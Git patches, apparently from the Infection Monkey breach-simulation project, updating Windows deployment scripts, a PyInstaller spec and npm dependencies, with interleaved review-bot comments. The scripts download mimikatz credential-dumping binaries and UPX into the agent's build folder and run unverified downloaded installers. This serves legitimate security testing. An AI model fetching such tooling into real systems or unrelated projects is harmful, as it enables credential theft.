@@ -22,24 +22,20 @@ $SAMBA_64_BINARY_NAME = "sc_monkey_runner64.so" # Other directories and paths ( most likely you dont need to configure) $MONKEY_ISLAND_DIR = "\monkey\monkey_island" $MONKEY_DIR = "\monkey\infection_monkey" -$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\exploit\sambacry_monkey_runner" +$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\bin" $PYTHON_DLL = "C:\Windows\System32\python27.dll" -$MK32_DLL = "mk32.dll" -$MK64_DLL = "mk64.dll" -$TEMP_PYTHON_INSTALLER = ".\python.msi" +$MK32_DLL = "mk32.zip" +$MK64_DLL = "mk64.zip" +$TEMP_PYTHON_INSTALLER = ".\python.exe" $TEMP_MONGODB_ZIP = ".\mongodb.zip" $TEMP_OPEN_SSL_ZIP = ".\openssl.zip" -$TEMP_CPP_INSTALLER = "cpp.exe" $TEMP_NPM_INSTALLER = "node.msi" $TEMP_PYWIN32_INSTALLER = "pywin32.exe" -$TEMP_UPX_ZIP = "upx.zip" -$UPX_FOLDER = "upx394w" # Other url's $MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip" $OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip" $NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi" -$PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b224/pywin32-224.win-amd64-py2.7.exe" -$UPX_URL = "https://github.com/upx/upx/releases/download/v3.94/upx394w.zip" -$MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.dll" -$MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.dll" +$PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b225/pywin32-225.win-amd64-py3.7.exe" +$MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.zip" +$MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.zip" diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 1bfb62445..c7192a4c8 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 
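Review bot: `$PYTHON_DLL = "C:\Windows\System32\python27.dll"` is left untouched as context while every other value here moves to Python 3.7, so whatever reads it (not visible in this hunk) will point at a Python 2 runtime. Also `$MK32_DLL`/`$MK64_DLL` now hold `.zip` names, so the `_DLL` suffix misleads; `$MK32_ZIP`/`$MK64_ZIP`, with the matching use sites in deploy_windows.ps1, would read correctly.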
@@ -53,6 +53,7 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, catch [System.Management.Automation.CommandNotFoundException] { "Downloading python 3 ..." + "Select 'add to PATH' when installing" $webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER) Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") @@ -60,23 +61,12 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, # Check if installed correctly $version = cmd.exe /c '"python" --version 2>&1' if ( $version -like '* is not recognized*' ) { - "Python is not found in PATH. Add it manually or reinstall python." + "Python is not found in PATH. If you just installed python you need to restart cmd. + Else, add it manually or reinstall python." return } } - # Set python home dir - $PYTHON_PATH = Split-Path -Path (Get-Command python | Select-Object -ExpandProperty Source) - - # Get vcforpython27 before installing requirements - "Downloading Visual C++ Compiler for Python 3 ..." - $webClient.DownloadFile($VC_FOR_PYTHON27_URL, $TEMP_VC_FOR_PYTHON27_INSTALLER) - Start-Process -Wait $TEMP_VC_FOR_PYTHON27_INSTALLER -ErrorAction Stop - $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") - Remove-Item $TEMP_VC_FOR_PYTHON27_INSTALLER - - # Install requirements for island - $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop "Upgrading pip..." $output = cmd.exe /c 'python -m pip install --user --upgrade pip 2>&1' $output 
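Review bot: The replacement message is a string literal broken across two source lines, so the output carries the embedded newline and the second line's leading indentation in the middle of a sentence. Keep it on one line, or build it as `"Python is not found in PATH. If you just installed python you need to restart cmd." + [Environment]::NewLine + "Else, add it manually or reinstall python."`. Deploy-Windows begins and ends outside the hunk.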
@@ -84,8 +74,11 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Make sure pip module is installed and re-run this script." return } + + "Installing python packages for island" + $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop & python -m pip install --user -r $islandRequirements - # Install requirements for monkey + "Installing python packages for monkey" $monkeyRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\requirements_windows.txt" & python -m pip install --user -r $monkeyRequirements @@ -115,7 +108,6 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Removing zip file" Remove-Item $TEMP_OPEN_SSL_ZIP - # Generate ssl certificate "Generating ssl certificate" Push-Location -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR) @@ -167,19 +159,6 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, $binDir = (Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\bin") New-Item -ItemType directory -path $binaries -ErrorAction SilentlyContinue - # Download upx - if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "upx.exe") )){ - "Downloading upx ..." - $webClient.DownloadFile($UPX_URL, $TEMP_UPX_ZIP) - "Unzipping upx" - Expand-Archive $TEMP_UPX_ZIP -DestinationPath $binDir -ErrorAction SilentlyContinue - Move-Item -Path (Join-Path -Path $binDir -ChildPath $UPX_FOLDER | Join-Path -ChildPath "upx.exe") -Destination $binDir - # Remove unnecessary files - Remove-Item -Recurse -Force (Join-Path -Path $binDir -ChildPath $UPX_FOLDER) - "Removing zip file" - Remove-Item $TEMP_UPX_ZIP - } - # Download mimikatz binaries $mk32_path = Join-Path -Path $binDir -ChildPath $MK32_DLL if(!(Test-Path -Path $mk32_path )){ 
diff --git a/monkey/infection_monkey/monkey.spec b/monkey/infection_monkey/monkey.spec index d29adddb1..e35fd2630 100644 --- a/monkey/infection_monkey/monkey.spec +++ b/monkey/infection_monkey/monkey.spec @@ -67,17 +67,11 @@ def process_datas(orig_datas): def get_binaries(): - binaries = get_windows_only_binaries() if is_windows() else get_linux_only_binaries() + binaries = [] if is_windows() else get_linux_only_binaries() binaries += get_sc_binaries() return binaries -def get_windows_only_binaries(): - binaries = [] - binaries += get_msvcr() - return binaries - - def get_linux_only_binaries(): binaries = [] binaries += get_traceroute_binaries() @@ -92,10 +86,6 @@ def get_sc_binaries(): return [(x, get_bin_file_path(x), 'BINARY') for x in ['sc_monkey_runner32.so', 'sc_monkey_runner64.so']] -def get_msvcr(): - return [('msvcr100.dll', os.environ['WINDIR'] + '\\system32\\msvcr100.dll', 'BINARY')] - - def get_traceroute_binaries(): traceroute_name = 'traceroute32' if is_32_bit() else 'traceroute64' return [(traceroute_name, get_bin_file_path(traceroute_name), 'BINARY')] From e7a71e10d8decc92b750fbdd0085e4eded57b850 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 3 Oct 2019 12:40:58 +0300 Subject: [PATCH 10/53] Removed enum34 from requirements --- .../infection_monkey/requirements_windows.txt | 2 - monkey/monkey_island/cc/ui/package-lock.json | 101 +++++++++--------- monkey/monkey_island/cc/ui/package.json | 14 +-- 3 files changed, 57 insertions(+), 60 deletions(-) diff --git a/monkey/infection_monkey/requirements_windows.txt b/monkey/infection_monkey/requirements_windows.txt index ce5021923..cb3f43660 100644 --- a/monkey/infection_monkey/requirements_windows.txt +++ b/monkey/infection_monkey/requirements_windows.txt @@ -1,4 +1,3 @@ -enum34 impacket pycryptodome cffi @@ -15,4 +14,3 @@ wmi pywin32 pymssql pyftpdlib -enum34 diff --git a/monkey/monkey_island/cc/ui/package-lock.json b/monkey/monkey_island/cc/ui/package-lock.json index 14e547416..b402cad83 100644 
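Review bot: With `get_msvcr` removed, this hunk deletes the only visible use of `os.environ` in monkey.spec; check whether `os` is still needed elsewhere in the file and drop the import if not (the top of the file is outside the hunk). A short comment on the new `binaries = [] if is_windows() else get_linux_only_binaries()` line would also record why Windows now contributes nothing, e.g. `# Windows builds bundle no CRT DLL any more; the runtime is expected to be installed on the host (confirm)`.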
--- a/monkey/monkey_island/cc/ui/package-lock.json +++ b/monkey/monkey_island/cc/ui/package-lock.json @@ -2731,7 +2731,7 @@ "dev": true, "requires": { "bluebird": "3.5.5", - "chownr": "1.1.2", + "chownr": "1.1.3", "figgy-pudding": "3.5.1", "glob": "7.1.4", "graceful-fs": "4.2.2", @@ -2759,7 +2759,7 @@ "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", "dev": true, "requires": { - "yallist": "3.0.3" + "yallist": "3.1.1" } }, "y18n": { @@ -2769,9 +2769,9 @@ "dev": true }, "yallist": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.0.3.tgz", - "integrity": "sha512-S+Zk8DEWE6oKpV+vI3qWkaK+jSbIK86pCwe2IF/xwIpQ8jEuxpw9NyaGjmp9+BoJv5FV2piqCDcoCtStppiq2A==", + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", + "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", "dev": true } } @@ -2945,9 +2945,9 @@ } }, "chownr": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-1.1.2.tgz", - "integrity": "sha512-GkfeAQh+QNy3wquu9oIZr6SS5x7wGdSgNQvD10X3r+AZr1Oys22HW8kAmDMvNg2+Dm0TeGaEuO8gFwdBXxwO8A==", + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/chownr/-/chownr-1.1.3.tgz", + "integrity": "sha512-i70fVHhmV3DtTl6nqvZOnIjbY0Pe4kAUjwHj8z0zAdgBtYrJyYwLKCCuRBQ5ppkyL0AkN7HKRnETdmdp1zqNXw==", "dev": true }, "chrome-trace-event": { 
@@ -5117,9 +5117,9 @@ } }, "eslint-plugin-react": { - "version": "7.14.3", - "resolved": "https://registry.npmjs.org/eslint-plugin-react/-/eslint-plugin-react-7.14.3.tgz", - "integrity": "sha512-EzdyyBWC4Uz2hPYBiEJrKCUi2Fn+BJ9B/pJQcjw5X+x/H2Nm59S4MJIvL4O5NEE0+WbnQwEBxWY03oUk+Bc3FA==", + "version": "7.15.1", + "resolved": "https://registry.npmjs.org/eslint-plugin-react/-/eslint-plugin-react-7.15.1.tgz", + "integrity": "sha512-YotSItgMPwLGlr3df44MGVyXnHkmKcpkHTzpte3QwJtocr3nFqCXCuoxFZeBtnT8RHdj038NlTvam3dcAFrMcA==", "dev": true, "requires": { "array-includes": "3.0.3", @@ -5652,9 +5652,9 @@ "optional": true }, "filepond": { - "version": "4.7.1", - "resolved": "https://registry.npmjs.org/filepond/-/filepond-4.7.1.tgz", - "integrity": "sha512-AxZBhsGS9QEJfbLiASUJMuS3hLhq/HbkKaJx1gKYCQ0lbs/OfciKKdeFbtAVKk0o9o6DcITw2C+QqFcTP1QBCg==" + "version": "4.7.2", + "resolved": "https://registry.npmjs.org/filepond/-/filepond-4.7.2.tgz", + "integrity": "sha512-OqG35MnmvrGnq2KgHO0PS8uujzRqQL/bMlSy0StqRn6RRAM6wBM9gzQl22IvWLwMyw6g8aIZTZAhMaiTS1LZsA==" }, "fill-range": { "version": "2.2.3", @@ -6362,7 +6362,7 @@ "bundled": true, "dev": true, "requires": { - "inherits": "~2.0.0" + "inherits": "2.0.3" } }, "boom": { @@ -6485,7 +6485,7 @@ "dev": true, "optional": true, "requires": { - "jsbn": "~0.1.0" + "jsbn": "0.1.1" } }, "extend": { @@ -6695,14 +6695,13 @@ "dev": true, "optional": true, "requires": { - "jsbn": "~0.1.0" + "jsbn": "0.1.1" } }, "jsbn": { "version": "0.1.1", "bundled": true, - "dev": true, - "optional": true + "dev": true }, "json-schema": { "version": "0.2.3", @@ -6716,7 +6715,7 @@ "dev": true, "optional": true, "requires": { - "jsonify": "~0.0.0" + "jsonify": "0.0.0" } }, "json-stringify-safe": { 
@@ -15577,9 +15576,9 @@ } }, "react": { - "version": "16.9.0", - "resolved": "https://registry.npmjs.org/react/-/react-16.9.0.tgz", - "integrity": "sha512-+7LQnFBwkiw+BobzOF6N//BdoNw0ouwmSJTEm9cglOOmsg/TMiFHZLe2sEoN5M7LgJTj9oHH0gxklfnQe66S1w==", + "version": "16.10.1", + "resolved": "https://registry.npmjs.org/react/-/react-16.10.1.tgz", + "integrity": "sha512-2bisHwMhxQ3XQz4LiJJwG3360pY965pTl/MRrZYxIBKVj4fOHoDs5aZAkYXGxDRO1Li+SyjTAilQEbOmtQJHzA==", "requires": { "loose-envify": "1.3.1", "object-assign": "4.1.1", @@ -15667,14 +15666,14 @@ } }, "react-dom": { - "version": "16.9.0", - "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-16.9.0.tgz", - "integrity": "sha512-YFT2rxO9hM70ewk9jq0y6sQk8cL02xm4+IzYBz75CQGlClQQ1Bxq0nhHF6OtSbit+AIahujJgb/CPRibFkMNJQ==", + "version": "16.10.1", + "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-16.10.1.tgz", + "integrity": "sha512-SmM4ZW0uug0rn95U8uqr52I7UdNf6wdGLeXDmNLfg3y5q5H9eAbdjF5ubQc3bjDyRrvdAB2IKG7X0GzSpnn5Mg==", "requires": { "loose-envify": "1.3.1", "object-assign": "4.1.1", "prop-types": "15.7.2", - "scheduler": "0.15.0" + "scheduler": "0.16.1" } }, "react-event-timeline": { @@ -15719,9 +15718,9 @@ } }, "react-hot-loader": { - "version": "4.12.13", - "resolved": "https://registry.npmjs.org/react-hot-loader/-/react-hot-loader-4.12.13.tgz", - "integrity": "sha512-4Byk3aVQhcmTnVCBvDHOEOUnMFMj81r2yRKZQSfLOG2yd/4hm/A3oK15AnCZilQExqSFSsHcK64lIIU+dU2zQQ==", + "version": "4.12.14", + "resolved": "https://registry.npmjs.org/react-hot-loader/-/react-hot-loader-4.12.14.tgz", + "integrity": "sha512-ecxH4eBvEaJ9onT8vkEmK1FAAJUh1PqzGqds9S3k+GeihSp7nKAp4fOxytO+Ghr491LiBD38jaKyDXYnnpI9pQ==", "dev": true, "requires": { "fast-levenshtein": "2.0.6", @@ -15746,7 +15745,7 @@ "integrity": "sha512-0XsbTXxgiaCDYDIWFcwkmerZPSwywfUqYmwT4jzewKTQSWoE6FCMoUVOeBJWK3E/CrWbxRG3m5GzY4lnIwGRBA==", "dev": true, "requires": { - "react-is": "16.9.0" + "react-is": "16.10.1" } }, "json5": { 
@@ -15770,9 +15769,9 @@ } }, "react-is": { - "version": "16.9.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-16.9.0.tgz", - "integrity": "sha512-tJBzzzIgnnRfEm046qRcURvwQnZVXmuCbscxUO5RWrGTXpon2d4c8mI0D8WE6ydVIm29JiLB6+RslkIvym9Rjw==", + "version": "16.10.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-16.10.1.tgz", + "integrity": "sha512-BXUMf9sIOPXXZWqr7+c5SeOKJykyVr2u0UDzEf4LNGc6taGkQe1A9DFD07umCIXz45RLr9oAAwZbAJ0Pkknfaw==", "dev": true }, "source-map": { @@ -16008,9 +16007,9 @@ } }, "react-toggle": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/react-toggle/-/react-toggle-4.0.2.tgz", - "integrity": "sha512-EPTWnN7gQHgEAUEmjheanZXNzY5TPnQeyyHfEs3YshaiWZf5WNjfYDrglO5F1Hl/dNveX18i4l0grTEsYH2Ccw==", + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/react-toggle/-/react-toggle-4.1.1.tgz", + "integrity": "sha512-+wXlMcSpg8SmnIXauMaZiKpR+r2wp2gMUteroejp2UTSqGTVvZLN+m9EhMzFARBKEw7KpQOwzCyfzeHeAndQGw==", "requires": { "classnames": "2.2.6" } @@ -16706,9 +16705,9 @@ } }, "scheduler": { - "version": "0.15.0", - "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.15.0.tgz", - "integrity": "sha512-xAefmSfN6jqAa7Kuq7LIJY0bwAPG3xlCj0HMEBQk1lxYiDKZscY2xJ5U/61ZTrYbmNQbXa+gc7czPkVo11tnCg==", + "version": "0.16.1", + "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.16.1.tgz", + "integrity": "sha512-MIuie7SgsqMYOdCXVFZa8SKoNorJZUWHW8dPgto7uEHn1lX3fg2Gu0TzgK8USj76uxV7vB5eRMnZs/cdEHg+cg==", "requires": { "loose-envify": "1.3.1", "object-assign": "4.1.1" 
@@ -17936,20 +17935,20 @@ } }, "terser": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/terser/-/terser-4.3.1.tgz", - "integrity": "sha512-pnzH6dnFEsR2aa2SJaKb1uSCl3QmIsJ8dEkj0Fky+2AwMMcC9doMqLOQIH6wVTEKaVfKVvLSk5qxPBEZT9mywg==", + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/terser/-/terser-4.3.4.tgz", + "integrity": "sha512-Kcrn3RiW8NtHBP0ssOAzwa2MsIRQ8lJWiBG/K7JgqPlomA3mtb2DEmp4/hrUA+Jujx+WZ02zqd7GYD+QRBB/2Q==", "dev": true, "requires": { - "commander": "2.20.0", + "commander": "2.20.1", "source-map": "0.6.1", "source-map-support": "0.5.13" }, "dependencies": { "commander": { - "version": "2.20.0", - "resolved": "https://registry.npmjs.org/commander/-/commander-2.20.0.tgz", - "integrity": "sha512-7j2y+40w61zy6YC2iRNpUe/NwhNyoXrYpHMrSunaMG64nRnaf96zO/KMQR4OyN/UnE5KLyEBnKHd4aG3rskjpQ==", + "version": "2.20.1", + "resolved": "https://registry.npmjs.org/commander/-/commander-2.20.1.tgz", + "integrity": "sha512-cCuLsMhJeWQ/ZpsFTbE765kvVfoeSddc4nU3up4fV+fDBcfUXnbITJ+JzhkdjzOqhURjZgujxaioam4RM9yGUg==", "dev": true }, "source-map": { @@ -17982,7 +17981,7 @@ "schema-utils": "1.0.0", "serialize-javascript": "1.9.1", "source-map": "0.6.1", - "terser": "4.3.1", + "terser": "4.3.4", "webpack-sources": "1.4.3", "worker-farm": "1.7.0" }, @@ -19710,9 +19709,9 @@ } }, "webpack": { - "version": "4.40.2", - "resolved": "https://registry.npmjs.org/webpack/-/webpack-4.40.2.tgz", - "integrity": "sha512-5nIvteTDCUws2DVvP9Qe+JPla7kWPPIDFZv55To7IycHWZ+Z5qBdaBYPyuXWdhggTufZkQwfIK+5rKQTVovm2A==", + "version": "4.41.0", + "resolved": "https://registry.npmjs.org/webpack/-/webpack-4.41.0.tgz", + "integrity": "sha512-yNV98U4r7wX1VJAj5kyMsu36T8RPPQntcb5fJLOsMz/pt/WrKC0Vp1bAlqPLkA1LegSwQwf6P+kAbyhRKVQ72g==", "dev": true, "requires": { "@webassemblyjs/ast": "1.8.5", diff --git a/monkey/monkey_island/cc/ui/package.json b/monkey/monkey_island/cc/ui/package.json index aa85164ce..6743638d5 100644 --- a/monkey/monkey_island/cc/ui/package.json 
+++ b/monkey/monkey_island/cc/ui/package.json @@ -37,7 +37,7 @@ "css-loader": "^1.0.1", "eslint": "^5.16.0", "eslint-loader": "^2.2.1", - "eslint-plugin-react": "^7.14.3", + "eslint-plugin-react": "^7.15.1", "file-loader": "^1.1.11", "glob": "^7.1.4", "html-loader": "^0.5.5", @@ -56,11 +56,11 @@ "phantomjs-prebuilt": "^2.1.16", "react-addons-test-utils": "^15.6.2", "react-event-timeline": "^1.6.3", - "react-hot-loader": "^4.12.13", + "react-hot-loader": "^4.12.14", "rimraf": "^2.7.1", "style-loader": "^0.22.1", "url-loader": "^1.1.2", - "webpack": "^4.40.2", + "webpack": "^4.41.0", "webpack-cli": "^3.3.9", "webpack-dev-server": "^3.8.1" }, @@ -74,7 +74,7 @@ "downloadjs": "^1.4.7", "fetch": "^1.1.0", "file-saver": "^2.0.2", - "filepond": "^4.7.1", + "filepond": "^4.7.2", "js-file-download": "^0.4.8", "json-loader": "^0.5.7", "jwt-decode": "^2.2.0", @@ -85,13 +85,13 @@ "pluralize": "^7.0.0", "prop-types": "^15.7.2", "rc-progress": "^2.5.2", - "react": "^16.9.0", + "react": "^16.10.1", "react-bootstrap": "^0.32.4", "react-copy-to-clipboard": "^5.0.1", "react-data-components": "^1.2.0", "react-desktop-notification": "^1.0.9", "react-dimensions": "^1.3.0", - "react-dom": "^16.9.0", + "react-dom": "^16.10.1", "react-fa": "^5.0.0", "react-filepond": "^7.0.1", "react-graph-vis": "^1.0.2", @@ -101,7 +101,7 @@ "react-router-dom": "^4.3.1", "react-spinners": "^0.5.13", "react-table": "^6.10.3", - "react-toggle": "^4.0.1", + "react-toggle": "^4.1.1", "react-tooltip-lite": "^1.10.0", "redux": "^4.0.4", "sass-loader": "^7.3.1", From 97542107dc657dd312d9da472c71e2b99208661c Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 3 Oct 2019 17:20:14 +0300 Subject: [PATCH 11/53] Fixed bug that caused PATH not to be refreshed after python installation --- deployment_scripts/deploy_windows.ps1 | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index c7192a4c8..87d6bc8cf 100644 
--- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -56,13 +56,12 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Select 'add to PATH' when installing" $webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER) Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop - $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") + $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User") Remove-Item $TEMP_PYTHON_INSTALLER # Check if installed correctly $version = cmd.exe /c '"python" --version 2>&1' if ( $version -like '* is not recognized*' ) { - "Python is not found in PATH. If you just installed python you need to restart cmd. - Else, add it manually or reinstall python." + "Python is not found in PATH. Add it to PATH and relaunch the script." return } } From dff71eabc4fedb5b8a3b09c17e691cd43da4dae8 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Mon, 7 Oct 2019 09:53:18 +0300 Subject: [PATCH 12/53] Added C++ redistributable required for windows and brought back UPX --- deployment_scripts/config.ps1 | 5 +++++ deployment_scripts/deploy_windows.ps1 | 19 +++++++++++++++++++ monkey/infection_monkey/monkey.spec | 1 + 3 files changed, 25 insertions(+) diff --git a/deployment_scripts/config.ps1 b/deployment_scripts/config.ps1 index a3dafc66e..095f7b899 100644 --- a/deployment_scripts/config.ps1 +++ b/deployment_scripts/config.ps1 
@@ -29,13 +29,18 @@ $MK64_DLL = "mk64.zip" $TEMP_PYTHON_INSTALLER = ".\python.exe" $TEMP_MONGODB_ZIP = ".\mongodb.zip" $TEMP_OPEN_SSL_ZIP = ".\openssl.zip" +$TEMP_CPP_INSTALLER = "cpp.exe" $TEMP_NPM_INSTALLER = "node.msi" $TEMP_PYWIN32_INSTALLER = "pywin32.exe" +$TEMP_UPX_ZIP = "upx.zip" +$UPX_FOLDER = "upx394w" # Other url's $MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip" $OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip" +$CPP_URL = "https://go.microsoft.com/fwlink/?LinkId=746572" $NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi" $PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b225/pywin32-225.win-amd64-py3.7.exe" $MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.zip" $MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.zip" +$UPX_URL = "https://github.com/upx/upx/releases/download/v3.94/upx394w.zip" diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 87d6bc8cf..0403185ff 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -107,6 +107,12 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Removing zip file" Remove-Item $TEMP_OPEN_SSL_ZIP + # Download and install C++ redistributable + "Downloading C++ redistributable ..." + $webClient.DownloadFile($CPP_URL, $TEMP_CPP_INSTALLER) + Start-Process -Wait $TEMP_CPP_INSTALLER -ErrorAction Stop + Remove-Item $TEMP_CPP_INSTALLER + # Generate ssl certificate "Generating ssl certificate" Push-Location -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR) 
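Review bot: `Start-Process -Wait $TEMP_CPP_INSTALLER` executes a just-downloaded binary with no check that it is the expected installer; `$CPP_URL` is a go.microsoft.com redirect, so a change at the far end silently changes what runs with the deploying user's privileges. Verify the Authenticode signature before launching, e.g. `if ((Get-AuthenticodeSignature $TEMP_CPP_INSTALLER).Status -ne 'Valid') { throw "C++ redistributable signature check failed" }`, and compare the signer subject as well. The UPX archive fetched in the next hunk of this commit has the same gap; there a pinned SHA-256 (`<expected-sha256 placeholder>`) compared against `Get-FileHash` output is the equivalent. Deploy-Windows begins and ends outside the hunk.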
@@ -158,6 +164,19 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, $binDir = (Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\bin") New-Item -ItemType directory -path $binaries -ErrorAction SilentlyContinue + # Download upx + if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "upx.exe") )){ + "Downloading upx ..." + $webClient.DownloadFile($UPX_URL, $TEMP_UPX_ZIP) + "Unzipping upx" + Expand-Archive $TEMP_UPX_ZIP -DestinationPath $binDir -ErrorAction SilentlyContinue + Move-Item -Path (Join-Path -Path $binDir -ChildPath $UPX_FOLDER | Join-Path -ChildPath "upx.exe") -Destination $binDir + # Remove unnecessary files + Remove-Item -Recurse -Force (Join-Path -Path $binDir -ChildPath $UPX_FOLDER) + "Removing zip file" + Remove-Item $TEMP_UPX_ZIP + } + # Download mimikatz binaries $mk32_path = Join-Path -Path $binDir -ChildPath $MK32_DLL if(!(Test-Path -Path $mk32_path )){ diff --git a/monkey/infection_monkey/monkey.spec b/monkey/infection_monkey/monkey.spec index e35fd2630..9c5fa9a18 100644 --- a/monkey/infection_monkey/monkey.spec +++ b/monkey/infection_monkey/monkey.spec @@ -38,6 +38,7 @@ def main(): debug=False, strip=get_exe_strip(), upx=True, + upx_exclude=['vcruntime140.dll'], console=True, icon=get_exe_icon()) From 6245be15ebc0ea280e1dfa9b970b2a63788fd681 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Mon, 7 Oct 2019 16:24:15 +0300 Subject: [PATCH 13/53] Automatically adds python scripts to path so user could use pyinstaller off the bat --- deployment_scripts/deploy_windows.ps1 | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 0403185ff..5a21c4daa 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 
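Review bot: `Expand-Archive $TEMP_UPX_ZIP -DestinationPath $binDir -ErrorAction SilentlyContinue` hides extraction failures, after which the `Move-Item` on the next line fails with a confusing path error and `Remove-Item $TEMP_UPX_ZIP` still deletes the only evidence; use `-ErrorAction Stop` so the failure surfaces where it happens. The extracted `upx.exe` becomes part of the build toolchain that packs the agent (`upx=True` in the monkey.spec hunk below), yet the archive fetched by `$webClient.DownloadFile($UPX_URL, $TEMP_UPX_ZIP)` is never verified; `if ((Get-FileHash $TEMP_UPX_ZIP -Algorithm SHA256).Hash -ne $UPX_SHA256) { throw "UPX archive hash mismatch" }`, with `$UPX_SHA256` added to config.ps1, closes that gap. `Remove-Item -Recurse -Force (Join-Path -Path $binDir -ChildPath $UPX_FOLDER)` is only safe while `$UPX_FOLDER` is non-empty, which deserves a comment on that line. Deploy-Windows begins and ends outside the hunk.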
